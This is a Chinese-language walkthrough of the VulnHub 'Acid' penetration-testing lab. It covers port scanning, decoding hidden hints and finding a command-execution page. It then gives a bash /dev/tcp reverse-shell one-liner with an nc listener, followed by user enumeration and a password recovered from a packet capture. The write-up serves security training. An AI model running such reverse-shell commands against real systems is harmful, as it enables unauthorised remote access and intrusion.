Acid
下載地址:
https://download.vulnhub.com/acid/Acid.rar
https://download.vulnhub.com/acid/Acid.rar.torrent
環境使用VMware 執行攻擊機kali與靶機Ubuntu
靶機地址發現,靶機IP為網路卡為 VMware 的192.168.0.104
掃描埠小提示:
nmap預設只對 1-1024 以及一些常用埠進行掃描。
對指定埠進行掃描:
nmap -p min-max
第一次掃描啥也沒有,這時候就應該用指定埠範圍的方式掃描所有的埠了。
經掃描全部埠發現,在 33447 埠上存在 http 服務。
嘗試掃描原始碼發現毫無收穫,只掃出來一個 index.html。經檢視頁面原始碼發現 16進位制字串
0x643239334c6d70775a773d3d
將其轉為字串得base64字串
d293LmpwZw== 再次解密得到 wow.jpg
直接檢視頁面http://192.168.0.104:33447/wow.jpg 發現並無收穫。再次檢查一遍,從原始碼中收穫了儲存圖片的資料夾 image
原來老外那邊也會用這種表情誇張的沙雕表情包。
在此頁面檢視原始碼發現毫無提示。想起來之前遇到過一道web CTF題是要把web介面的圖片儲存下來,最後的flag在圖片中。
講圖片以16進位制開啟,發現還真有意外收穫。
踩坑小貼士:
原本以為這裡直接使用ascii轉碼,轉出來是一個看不懂的東西
%=AAB$@#&&A@''#AA!%B$=%?$@"
經 ascii 轉 hex之後得到一串md5加密值
7aee0f6d588ed9905ee37f16a7c610d4 解密為 63425
聯想到之前 index.html 所說的使用鑰匙開啟魔法門,那麼這串數字字串應該就是開啟門的關鍵了
現在啥發現都沒有了,開始使用查詢web目錄。經過一個個檢視,最終將突破點鎖定在 Challenge目錄下,點開後發現是一個登入介面
再次掃描 challenge目錄下檔案能發現
error.php:預設報錯頁面
hacked.php:檢視會302到另一個頁面,提示需要登陸後檢視
include.php:同樣需要登陸後檢視
cake.php:登陸後檢視,且其 頁面的title告訴我們還有一個資料夾叫 /Magic_Box
todo.txt:這個有東西,圖片放在下面了
.gitignore:一個 git 忽略檔案
既然找不到別的東西,那麼就試試爆破新發現的目錄
http://192.168.0.104:33447/Challenge/Magic_Box
發現一個 command.php,其中有命令執行。嘗試能不能彈個shell
成功獲得shell
靶機:echo "bash -i >& /dev/tcp/192.168.0.108/1234 0>&1" | bash
kali:nc -lvp 1234
在 /etc/passwd 處檢視到三個可以關注的使用者分別是: root、saman、acid
分別檢視三個使用者所擁有的檔案。在 acid使用者所有的檔案下發現一個流量包,他的名字也告訴我們這是一個提示,另外底下的 pwn_me資料夾是不是說這個地方還可以使用 PWN 來做呢?我們也沒學過PWN,我們也不懂
find / -user acid 2>/dev/null
將其下載到windows真實機中進行檢視。
握手包和分手包(忘了斷開連線的那個過程叫啥了)就不用看了。最終在TPC流量包中找到了疑似saman的密碼。
成功獲得flag
